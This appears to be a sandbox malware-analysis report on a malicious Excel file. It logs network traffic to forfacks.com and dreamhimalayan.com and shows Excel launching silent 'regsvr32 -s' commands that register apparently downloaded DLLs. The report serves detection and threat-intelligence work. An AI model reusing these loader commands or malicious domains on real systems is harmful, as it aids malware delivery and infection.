,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 10, 2021 09:11:46.461498022 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.625560045 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.625725985 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.626621008 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.790744066 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.792167902 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.792213917 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.792252064 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.792279005 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.792386055 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.792439938 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.796487093 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.796684027 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.815614939 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.980253935 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.980473042 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:46.981164932 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:47.186804056 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.569124937 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.569238901 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:47.569528103 CEST44349733192.185.48.167192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.569617033 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:11:47.910079002 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.074181080 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.074347019 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.075665951 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.241362095 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.241841078 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.241867065 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.241889000 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.241904020 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.241930962 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.241962910 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.241992950 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.243185997 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.243252039 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.251816034 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.418508053 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.418637037 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.419409990 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:48.624430895 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.247925043 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.247977018 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248013973 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248037100 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248050928 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248061895 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248065948 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248090982 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248123884 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248138905 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248151064 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248172998 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248189926 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248212099 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248222113 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248251915 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248262882 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248291969 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.248301983 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.248341084 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.413909912 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.413964987 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.414005995 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:49.414052963 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.414112091 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.414119005 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.418772936 CEST49735443192.168.2.4192.185.113.120
                                                                                                                  Jun 10, 2021 09:11:49.582755089 CEST44349735192.185.113.120192.168.2.4
                                                                                                                  Jun 10, 2021 09:13:32.774796009 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:33.163909912 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:33.867224932 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:35.258016109 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:38.023844957 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:43.555650949 CEST49733443192.168.2.4192.185.48.167
                                                                                                                  Jun 10, 2021 09:13:54.603156090 CEST49733443192.168.2.4192.185.48.167

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 10, 2021 09:11:32.420238972 CEST4971453192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:32.470541000 CEST53497148.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:33.775549889 CEST5802853192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:33.827482939 CEST53580288.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:34.408935070 CEST5309753192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:34.470150948 CEST53530978.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:34.711987019 CEST4925753192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:34.765028000 CEST53492578.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:36.036412001 CEST6238953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:36.087820053 CEST53623898.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:41.579524994 CEST4991053192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:41.633224964 CEST53499108.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:42.761282921 CEST5585453192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:42.851767063 CEST53558548.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:43.227358103 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:43.300944090 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:44.264478922 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:44.337295055 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:44.402272940 CEST6315353192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:44.454766989 CEST53631538.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:45.312062979 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:45.370973110 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.263258934 CEST5299153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:46.459330082 CEST53529918.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:46.738806009 CEST5370053192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:46.790254116 CEST53537008.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.358406067 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:47.417809963 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.586296082 CEST5172653192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:47.852200985 CEST5679453192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:47.905797005 CEST53517268.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:47.915971041 CEST53567948.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:48.950701952 CEST5653453192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:49.002130985 CEST53565348.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:50.128470898 CEST5662753192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:50.178719997 CEST53566278.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:51.094398975 CEST5662153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:51.144933939 CEST53566218.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:51.405678988 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:51.456408978 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:52.831593990 CEST6311653192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:52.881781101 CEST53631168.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:57.244462013 CEST6407853192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:57.294754028 CEST53640788.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:58.362709045 CEST6480153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:58.414344072 CEST53648018.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:11:59.277165890 CEST6172153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:11:59.330298901 CEST53617218.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:00.201406956 CEST5125553192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:00.251739979 CEST53512558.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:01.333389044 CEST6152253192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:01.404387951 CEST53615228.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:01.933512926 CEST5233753192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:01.987066031 CEST53523378.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:02.849838972 CEST5504653192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:02.914139986 CEST53550468.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:16.486932039 CEST4961253192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:16.639662027 CEST53496128.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:17.723267078 CEST4928553192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:17.763676882 CEST5060153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:17.792614937 CEST53492858.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:17.910018921 CEST53506018.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:18.939513922 CEST6087553192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:19.002003908 CEST53608758.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:19.791115999 CEST5644853192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:19.854918003 CEST53564488.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:21.022384882 CEST5917253192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:21.076010942 CEST53591728.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:22.068352938 CEST6242053192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:22.130304098 CEST53624208.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:22.952943087 CEST6057953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:23.015196085 CEST53605798.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:24.444977999 CEST5018353192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:24.505942106 CEST53501838.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:25.908499002 CEST6153153192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:25.967746019 CEST53615318.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:26.813075066 CEST4922853192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:26.833408117 CEST5979453192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:26.875242949 CEST53492288.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:26.895925045 CEST53597948.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:36.324589968 CEST5591653192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:36.393054008 CEST53559168.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:36.613006115 CEST5275253192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:36.679986954 CEST53527528.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:12:47.085129976 CEST6054253192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:12:47.145867109 CEST53605428.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:13:10.674257994 CEST6068953192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:13:10.748294115 CEST53606898.8.8.8192.168.2.4
                                                                                                                  Jun 10, 2021 09:13:11.972161055 CEST6420653192.168.2.48.8.8.8
                                                                                                                  Jun 10, 2021 09:13:12.030721903 CEST53642068.8.8.8192.168.2.4

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Jun 10, 2021 09:11:46.263258934 CEST192.168.2.48.8.8.80x822aStandard query (0)forfacks.comA (IP address)IN (0x0001)
                                                                                                                  Jun 10, 2021 09:11:47.586296082 CEST192.168.2.48.8.8.80xe0b4Standard query (0)dreamhimalayan.comA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Jun 10, 2021 09:11:46.459330082 CEST8.8.8.8192.168.2.40x822aNo error (0)forfacks.com192.185.48.167A (IP address)IN (0x0001)
                                                                                                                  Jun 10, 2021 09:11:47.905797005 CEST8.8.8.8192.168.2.40xe0b4No error (0)dreamhimalayan.com192.185.113.120A (IP address)IN (0x0001)

                                                                                                                  HTTPS Packets

                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                  Jun 10, 2021 09:11:46.796487093 CEST192.185.48.167443192.168.2.449733CN=*.forfacks.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun May 16 07:28:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sat Aug 14 07:28:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                  CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                  Jun 10, 2021 09:11:48.243185997 CEST192.185.113.120443192.168.2.449735CN=*.dreamhimalayan.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun May 16 02:04:50 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sat Aug 14 02:04:50 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                  CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:09:11:41
                                                                                                                  Start date:10/06/2021
                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                  Imagebase:0x1a0000
                                                                                                                  File size:27110184 bytes
                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:09:11:49
                                                                                                                  Start date:10/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:regsvr32 -s ..\werty1.dll
                                                                                                                  Imagebase:0xab0000
                                                                                                                  File size:20992 bytes
                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:09:11:49
                                                                                                                  Start date:10/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:regsvr32 -s ..\werty2.dll
                                                                                                                  Imagebase:0xab0000
                                                                                                                  File size:20992 bytes
                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >